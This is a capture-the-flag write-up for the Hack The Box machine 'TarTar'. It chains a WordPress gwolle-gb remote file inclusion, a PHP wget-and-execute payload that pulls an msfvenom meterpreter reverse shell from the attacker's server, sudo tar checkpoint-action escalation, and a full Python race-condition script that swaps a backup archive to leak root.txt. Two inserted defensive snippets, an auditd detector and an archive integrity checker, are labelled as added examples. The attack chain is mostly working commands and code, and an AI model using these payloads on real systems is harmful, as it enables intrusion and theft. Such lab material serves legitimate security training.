Tar Tar root.txt Write Up


by winstein smithe

-±±±enumerate-±±±
dirb is as good a place as any to start

dirb http://10.10.10.88 /usr/share/dirb/wordlists/common.txt

the ip of course of the victim box

this tells us there are two web services, monstra and wordpress. i dont know much about monstra, but theres lots of wp sites, quality enum tools also.


wpscan will come in handy, to discover whats running,

wpscan --url 10.10.10.88/webservices/wp/ --wp-content-dir /wp-content/ --enumerate p

dont pay attention to suggested exploits, try em, if ya like rabbit holes.

this should tell you about the plugins. a lil googling tells us, gwolle-gb allows a remote file inclusion opportunity when doing a capture. lets move towards a foot hold.


##$###foothold###$##

on attacking machine
make a file in /var/www/html called wp-load.php
containing:

<?php system("wget http://10.10.*.*:80/shellzbubs -O /tmp/shell; chmod 777 /tmp/shell; /tmp/shell") ?>

10.10.. is the ip of attacking machine within HtB vpn, i wasnt advertising my own ip.


then, create a payload called shellzbubs:

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.. LPORT=4000 -f elf -o shellzbubs

where LHOST is openVPN “tun0 address” from hackthebox also.


next, in same terminal in the directory containing shellzbubs and wp-load.php, start a SimpleHTTPServer on port 80:

python -m SimpleHTTPServer 80


now you set up a listener. open new terminal, fire up metasploit:
use exploit/multi/handler
set LHOST 10.10..
set LPORT 4000
set PAYLOAD linux/x86/meterpreter_reverse_tcp
exploit

where LH and LP are the same as the payloads

-±±± Exploit That Shit -±±±

in web browser, go to vuln gwolle-gb dir, but call wp-load from your server:

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10../

wp-load.php is called automatically by the server, as long as your php tells it to download, change permissions to 777, and run the reverse meterpreter shell, it should connect. you now have a foot hold.

-±±± get user -±±±

find out what sudo can do for you.
sudo -l

we find /bin/tar has onuma user rights, misconfigured.


tar takes wildcards. one can go the clusterfuck route, using a shell script, but i prefer elegance:

sudo -u onuma tar cf /dev/null /tmp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash

sudo runs tar as onuma, with the checkpoint action set to execute /bin/bash. Because the sudoers config lets us run tar as onuma, we as another user can run a shell in onuma's name. Thus allowing us to explore the system as user onuma.

now you're user onuma, grab that user.txt file.
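For whoever has to watch for this on their own hosts, here is a detection sketch over auditd EXECVE records. It is an added example, not part of the original write-up: the sample records are constructed, the function names are made up for illustration, and it goes a bit beyond the one option used above by covering the other GNU tar long options that start a program.

```python
import re

# GNU tar long options that make tar start another program.
EXEC_OPTS = ("--checkpoint-action", "--to-command", "--use-compress-program",
             "--rsh-command", "--info-script", "--new-volume-script")
ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

def parse_execve(line):
    """Decode an auditd EXECVE record into argv (hex-encoded args are unhexed)."""
    if "type=EXECVE" not in line:
        return None
    args = {}
    for idx, quoted, hexed in ARG.findall(line):
        args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return [args[i] for i in sorted(args)]

def exec_options(argv):
    """Return the tar arguments in argv that would start another program."""
    names = [a.rsplit("/", 1)[-1] for a in argv]
    if "tar" not in names:
        return []
    rest = argv[names.index("tar") + 1:]
    hits = []
    for i, arg in enumerate(rest):
        opt, _, val = arg.partition("=")
        if not val and i + 1 < len(rest):
            val = rest[i + 1]  # "--option value" form
        # Abbreviated long options are accepted, so match prefixes; plain "--checkpoint" is harmless.
        if len(opt) < 5 or opt == "--checkpoint":
            continue
        if any(full.startswith(opt) and
               (full != "--checkpoint-action" or val.startswith("exec"))
               for full in EXEC_OPTS):
            hits.append(arg)
    return hits

def detect(lines):
    found = [(n, exec_options(parse_execve(l) or [])) for n, l in enumerate(lines, 1)]
    return [(n, hits) for n, hits in found if hits]

# Constructed sample records; the last argument of the third is hex-encoded, as auditd does for spaces.
SAMPLE_LOG = [
    'type=EXECVE msg=audit(1530000000.100:41): argc=4 a0="/bin/tar" a1="-zcvf" a2="/var/tmp/.bk" a3="/var/www/html"',
    'type=EXECVE msg=audit(1530000060.200:57): argc=9 a0="sudo" a1="-u" a2="onuma" a3="tar" a4="cf" a5="/dev/null" '
    'a6="/tmp/exploit" a7="--checkpoint=1" a8="--checkpoint-action=exec=/bin/bash"',
    'type=EXECVE msg=audit(1530000090.300:63): argc=4 a0="tar" a1="cf" a2="/tmp/archive.tar" a3='
    + "--checkpoint-action=exec=sh shell.sh".encode().hex().upper(),
]
```

The underlying fix is still the sudoers entry: a rule that lets one user run tar as another hands over that account, whatever the logs say afterwards.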

-±±±Dance For Root -±±±

more enumeration

cd /usr/sbin (often home to neat shit)
ls -la | grep root

reveals a lot of interesting options, but the name of the box is a clue, we exploited tar once to esc priv, so we’re looking for something tar related.

backuperer is looking a little odd, not a well-known process, like CD or LS or cat, so it’s worth looking at. Checking its type you see it’s a bash script text file so cat that badmotherfucker and take a look at it. It’s a homemade script that uses tar to back up the website in the event of script kiddies.

this is eye catching,


# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}


the sleep after the creation of the tar backup, but before the backup is checked with diff, creates a race condition we can exploit.
it's in these 30 seconds that the archive can be “recreated” by the attacker with an added symlink file that points to the root.txt flag.
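What closing that window could look like, as an added example that is not part of the original post or of backuperer: pin the archive's digest the moment it is written, then before extracting refuse anything that changed or that carries links, path escapes or setuid bits. The function names and the sample archives are constructed for illustration.

```python
import hashlib
import io
import os
import stat
import tarfile

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def vet_archive(data, pinned_sha256):
    """Return reasons to refuse the archive bytes; an empty list means accept."""
    if sha256_hex(data) != pinned_sha256:
        return ["digest mismatch: archive changed after it was written"]
    problems = []
    # Parse the same bytes that were hashed, so nothing can be swapped in between.
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            name = os.path.normpath(m.name)
            if m.issym() or m.islnk():
                problems.append("link: %s -> %s" % (m.name, m.linkname))
            elif not (m.isfile() or m.isdir()):
                problems.append("special file: %s" % m.name)
            if os.path.isabs(name) or name == ".." or name.startswith("../"):
                problems.append("escapes target dir: %s" % m.name)
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                problems.append("setuid/setgid: %s" % m.name)
    return problems

def build_sample(entries):
    """Constructed test data: (name, symlink_target_or_None) pairs -> tar.gz bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, link in entries:
            info = tarfile.TarInfo(name)
            if link:
                info.type, info.linkname = tarfile.SYMTYPE, link
                tar.addfile(info)
            else:
                body = b"<html>dev site</html>"
                info.size = len(body)
                tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()

# Constructed archives: the genuine backup and a swapped-in one carrying a symlink.
GENUINE = build_sample([("var/www/html/index.html", None)])
SWAPPED = build_sample([("var/www/html/index.html", None), ("var/www/html/notes.txt", "/root/root.txt")])
PIN = sha256_hex(GENUINE)  # recorded when the backup is written
if __name__ == "__main__":
    print(vet_archive(SWAPPED, PIN), vet_archive(SWAPPED, sha256_hex(SWAPPED)))
```

The checks only help if extraction then uses the same vetted bytes. Writing the temp archive into a directory that only root can modify removes the window altogether.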

needed a python script to take advantage of a race condition in backuperer.

[also at bottom of post in case pastebin dies]

*first, we create a hidden /var / tmp/ directory and add a symlink pointing to /root.txt/ into the “live”(where server points 10.10.10.88) /var / www / html/(spaces for forum filter)

*then we backup … /html into our tmp dir, which includes this poisoned symlink. we call this maltar for now.

*now we rm the symlink from the live… /html dir so that the backup created by backuperer will NOT contain the symlink.

*next the script listens for backuperer to run

*then for tar to run

*once tar is running we start looking for the tmpfile backuperer has created.
—this gives us the name of the tar backup
—we’re going to replace, and also lets us
—know the back up has been made, and the
—30 second sleep has begun.

*we wait 15 seconds, for the same reason backuperer waits 30 seconds(giving the backup process time to complete)

*we can now replace the tmpfile backup created by backuperer with our maltar.
—backuperer should take 5-8 100ths of
—a second to complete, so 15 sec in,
—we should have no problems.

*backuperer will now run /diff/ to see if there are changes, which there certainly will be. it spits an error report into a txt file…

*we grep that error log for a flag indicating the contents of the root.txt flag. and put it on the screen to victory.

*copy n paste root flag on machines page, revel in glory. << not part of the script, but if you can add it, that would be boss.

you now have the root flag…but wait, a bonus round awaits.

At the time of writing im looking for the root shell access.

seems promising, particularly:


  • Attack automation that extracts tar originating from a web
    application or similar sources. Such operation might be performed by
    a setuid root component of the application. The command executed
    could be for example:

    #tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

    The attacker can overwrite /var/spool/cron/crontabs/root to gain code
    execution as root. It is also possible to replace binaries commonly
    executed by root with a backdoored ones, or to drop setuid root
    binaries that will enable the attacker to gain root privileges at
    will. Common attack would be to replace some network facing daemon
    with backdoored one, enabling covert code execution on demand.


in backuperer we find,

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check

im currently investigating the pointy feather option. two ideas,

thinking is to tweak the creation of maltar a bit…
1 create a tar file of /bin/bash holding root privilege from my attacking machine into my webserver dir.
2 from www-data shell wget the maltar, from within the script into tmp dir that maltar is currently generated locally.
3 add the contents of/var /ww /html/ to mal tar.
4. when backuperer generates the “check” folder it should extract the contents of html/ to check…how to extract /bin/bash into /bin/ not /check/ bin / is the challenge. maybe a job for wildcards?

  1. less complicated is to overwrite the /shadow file with a hash you know…which i think is the right answer, the question still remains, how to add fresh /etc/shadow to the poisoned tar, and how to get backuperer to run tar with the arguments we want.

    perhaps we can change the contents of backuperers bash variables… $tmpfile and $check are ultimately just strings, containing a file and dir names. but they are only names when used in the context of names. they could also be used as arguments.

we need to insert an extra argument telling tar to extract /etc/shadow into /etc/

i think, if we can add " etc/shadow /etc " into $change and make sure theres a known hash shadow file present in maltar, it should overwrite the shadow and allow for easy root login.

/bin/tar -zxvf $tmpfile -C $check into
/bin/tar -zxvf $tmpfile -C etc/shadow /etc/

these are just thoughts, but when i figure it out, ill update.

ideas welcome.

the taRooter.py***
#!/usr/bin/env python

# thanks to raiden99 for helping me see
# the right direction and light in the tunnel
# but not holding my hand 2 root
import datetime
import os
import time

process_name = "backuperer"
tarunnin = "tar"
sleepyet = "sleep"
wtdiff = "diff"
maltar = "maltar.tar"
tmpfile = ""  # filled in by check_for_tmpfile()


def cleanup():
    # not called by default, see the commented-out call further down
    os.popen("rm maltar.tar shell.sh").read()
    print("clean slate bitches")


def create_simlink():
    os.popen("ln -s /root/root.txt /var/www/html/boobies.txt").read()
    simthere = os.popen("ls -a /var/www/html/ | grep -E 'boobies.txt'").read()
    print("we made " + str(simthere) + " at: " + str(datetime.datetime.now()))
    print("")


def create_mal_tar():
    os.popen("tar zvcPf " + maltar + " /var/www/html/").read()
    tmpchk = os.popen("ls -a " + str(maltar)).read()
    print("file: " + str(tmpchk) + " created at: " + str(datetime.datetime.now()))
    print("")


def rm_simlink():
    os.popen("rm /var/www/html/boobies.txt").read()
    tmpchk = os.popen("ls /var/www/html/ |grep boob*").read()
    print("is there boobie.txt?   " + str(tmpchk))
    print("")


def check_process(prcssname):
    # poll the process list until a process with this name shows up
    print("looking for " + prcssname + " at: " + str(datetime.datetime.now()))
    while True:
        tmp = os.popen("ps -e").read()
        if prcssname not in tmp:
            continue
        dttime = datetime.datetime.now()
        print(prcssname + " ran at: " + str(dttime))
        print("")
        break


def check_for_tmpfile():
    # the backup tmpfile is a dotfile with a long random name in /var/tmp
    global tmpfile
    print("lets find that tmpfile name")
    while True:
        tmpfile = os.popen(r"ls -a /var/tmp |grep -E '[.]\w{10,}'").read().strip()
        if tmpfile == "":
            continue  # keep tryin
        dttime = datetime.datetime.now()
        print(tmpfile + " is the tmpfile name")
        print("found at: " + str(dttime))
        print("")
        break


def tmpfile_check():
    print("tmpfile variable really global? " + str(tmpfile))
    print("")


def makin_copies(newtar):
    dttime = datetime.datetime.now()
    tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
    print("")
    print("hash for legit tar: " + str(tmphash))
    print("")
    tmp = "#!/bin/bash"
    print("makin copies of " + str(newtar) + " at: " + str(dttime))
    # shell.sh copies maltar over the tmpfile; it is run as onuma through tar
    os.popen("echo '" + str(tmp) + "' >> shell.sh").read()
    os.popen("echo 'cp " + maltar + " /var/tmp/" + tmpfile + "' >> shell.sh").read()
    os.popen("chmod +x ./shell.sh").read()
    os.popen("sudo -u onuma tar cf /tmp/archive.tar --checkpoint=1 --checkpoint-action=exec=sh shell.sh").read()
    tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
    print("new tar hash: " + str(tmphash))
    print("")


def sleep_a_sec():
    dttime = datetime.datetime.now()
    print("waiting 15 sec start now: " + str(dttime))
    time.sleep(15)
    dttime = datetime.datetime.now()
    print("has it been 15 seconds?" + str(dttime))
    print("")


def cat_log():
    #tmp = os.popen("cat /var/backups/onuma_backup_error.txt |grep boobies.txt").read()
    tmp = os.popen("tail -n 50 /var/backups/onuma_backup_error.txt | grep \\>").read()
    print("hash should be near /")
    print("")
    print(str(tmp))


#cleanup()
startshitright = os.popen("rmdir /var/tmp/.b && mkdir /var/tmp/.b && cd /var/tmp/.b").read()
print("started right")
create_simlink()
create_mal_tar()
rm_simlink()
check_process(process_name)
check_process(tarunnin)
check_process(sleepyet)
sleep_a_sec()
check_for_tmpfile()
#makin_copies(tmpfile)
check_process(wtdiff)
#time.sleep(25)
makin_copies(tmpfile)
cat_log()